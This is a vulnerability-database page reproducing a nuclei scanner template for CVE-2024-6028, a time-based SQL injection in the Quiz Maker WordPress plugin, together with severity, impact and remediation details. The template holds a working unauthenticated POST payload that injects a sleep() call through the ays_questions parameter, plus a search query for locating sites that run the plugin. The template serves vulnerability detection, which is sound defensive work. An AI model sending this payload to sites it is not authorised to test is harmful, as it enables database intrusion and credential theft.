Lucene search
K

Quiz Maker <= 6.5.8.3 - SQL Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 59 Views

Quiz Maker <= 6.5.8.3 - SQL Injection, WordPress plugin vulnerabilit

Related
Refs
Code
id: CVE-2024-6028

info:
  name: Quiz Maker <= 6.5.8.3 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection through the ays_questions parameter to extract the complete WordPress database including user credentials, quiz data, and site information.
  remediation: Fixed in 6.5.8.4
  reference:
    - https://github.com/truonghuuphuc/CVE-2024-6028-Poc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6028
    cwe-id: CWE-89
    epss-score: 0.11755
    epss-percentile: 0.95559
    cpe: cpe:2.3:a:ays-pro:quiz_maker:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/quiz-maker/"
    product: quiz_maker
    vendor: ays-pro
  tags: time-based-sqli,cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli,vuln,vkev

http:
  - raw:
      - |
        @timeout: 25s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains_all(body,"status\":","scoreMessage","displayScore")'
        condition: and
# digest: 4b0a00483046022100850af70afd9203763ea81c7de84dcbbb912f4e2798651a9c9f7dcf9ac21d72d4022100985462d2e499d538964e319f6ea8376877c08c55ab295f47aaefae77e269bef4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.11755
SSVC
59